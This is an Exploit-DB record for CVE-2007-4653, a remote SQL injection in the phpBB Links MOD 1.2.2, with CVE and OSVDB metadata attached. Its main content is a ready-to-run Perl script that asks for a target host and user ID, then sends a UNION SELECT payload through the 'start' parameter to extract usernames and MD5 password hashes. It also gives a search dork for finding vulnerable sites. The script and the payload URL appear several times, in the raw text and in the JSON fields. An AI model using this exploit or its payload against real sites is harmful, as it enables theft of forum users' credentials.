ID EDB-ID:4346
Type exploitdb
Reporter Don
Modified 2007-08-31T00:00:00
Description
phpBB Links MOD 1.2.2 Remote SQL Injection Exploit. CVE-2007-4653. Webapps exploit for php platform
#!/usr/bin/perl
print q{
phpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit
Bug discovered by Don
Dork: allinurl:links.php?t=search
or: "Links MOD v1.2.2 by phpBB2.de"
SQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*
};
use IO::Socket;
print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=".$user."/*";
print "
Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
# milw0rm.com [2007-08-31]
{"published": "2007-08-31T00:00:00", "id": "EDB-ID:4346", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "560f75068326588c7ae9cdda5a9440ac28fb5cadc949ab6240d5281ee8987c59", "description": "phpBB Links MOD 1.2.2 Remote SQL Injection Exploit. CVE-2007-4653. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/4346/", "lastseen": "2016-01-31T20:42:41", "edition": 1, "title": "phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit", "osvdbidlist": ["38427"], "modified": "2007-08-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 7, "cvelist": ["CVE-2007-4653"], "sourceHref": "https://www.exploit-db.com/download/4346/", "references": [], "reporter": "Don", "sourceData": "#!/usr/bin/perl\n\nprint q{\n\nphpBB <= 2.0.22 - Links MOD <= v1.2.2 Remote SQL Injection Exploit\n\nBug discovered by Don\nDork: allinurl:links.php?t=search\n or: \"Links MOD v1.2.2 by phpBB2.de\"\nSQL INJECTION: Exploit: links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*\n\n};\n\nuse IO::Socket;\n\nprint q{\n=> Insert URL\n=> without ( http )\n=> };\n$server = <STDIN>;\nchop ($server);\nprint q{\n=> Insert directory\n=> es: /forum/ - /phpBB2/\n=> };\n$dir = <STDIN>;\nchop ($dir);\nprint q{\n=> User ID\n=> Number:\n=> };\n$user = <STDIN>;\nchop ($user);\nif (!$ARGV[2]) {\n}\n$myuser = $ARGV[3];\n$mypass = $ARGV[4];\n$myid = $ARGV[5];\n$server =~ s/(http:\\/\\/)//eg;\n$path = $dir;\n$path .= \"links.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=\".$user.\"/*\";\nprint \"\nExploit in process...\\r\\n\";\n$socket = IO::Socket::INET->new(\nProto => \"tcp\",\nPeerAddr => \"$server\",\nPeerPort => \"80\") || die \"Exploit failed\";\nprint \"Exploit\\r\\n\";\nprint \"in process...\\r\\n\";\nprint $socket \"GET $path HTTP/1.1\\r\\n\";\nprint $socket \"Host: $server\\r\\n\";\nprint $socket \"Accept: */*\\r\\n\";\nprint $socket \"Connection: close\\r\\n\\r\\n\";\nprint \"Exploit finished!\\r\\n\\r\\n\";\nwhile ($answer = <$socket>)\n{\nif ($answer =~/(\\w{32})/)\n{\nif ($1 ne 0) {\nprint \"MD5-Hash is: \".$1.\"\\r\\n\";\n}\nexit();\n}\n}\n\n# milw0rm.com [2007-08-31]\n", "objectVersion": "1.0"}
{"result": {"cve": [{"id": "CVE-2007-4653", "type": "cve", "title": "CVE-2007-4653", "description": "SQL injection vulnerability in links.php in the Links MOD 1.2.2 and earlier for phpBB 2.0.22 and earlier allows remote attackers to execute arbitrary SQL commands via the start parameter in a search action.", "published": "2007-09-04T18:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4653", "cvelist": ["CVE-2007-4653"], "lastseen": "2017-09-29T14:25:30"}], "osvdb": [{"id": "OSVDB:38427", "type": "osvdb", "title": "Links MOD for phpBB links.php search Action start Variable SQL Injection", "description": "## Manual Testing Notes\nlinks.php?t=search&search_keywords=asd&start=1,1%20UNION%20SELECT%201,username,user_password,4,5,6,7,8,9,10,11,12%20FROM%20phpbb_users%20WHERE%20user_id=2/*\n## References:\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4346\n[CVE-2007-4653](https://vulners.com/cve/CVE-2007-4653)\nBugtraq ID: 25501\n", "published": "2007-08-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:38427", "cvelist": ["CVE-2007-4653"], "lastseen": "2017-04-28T13:20:34"}]}}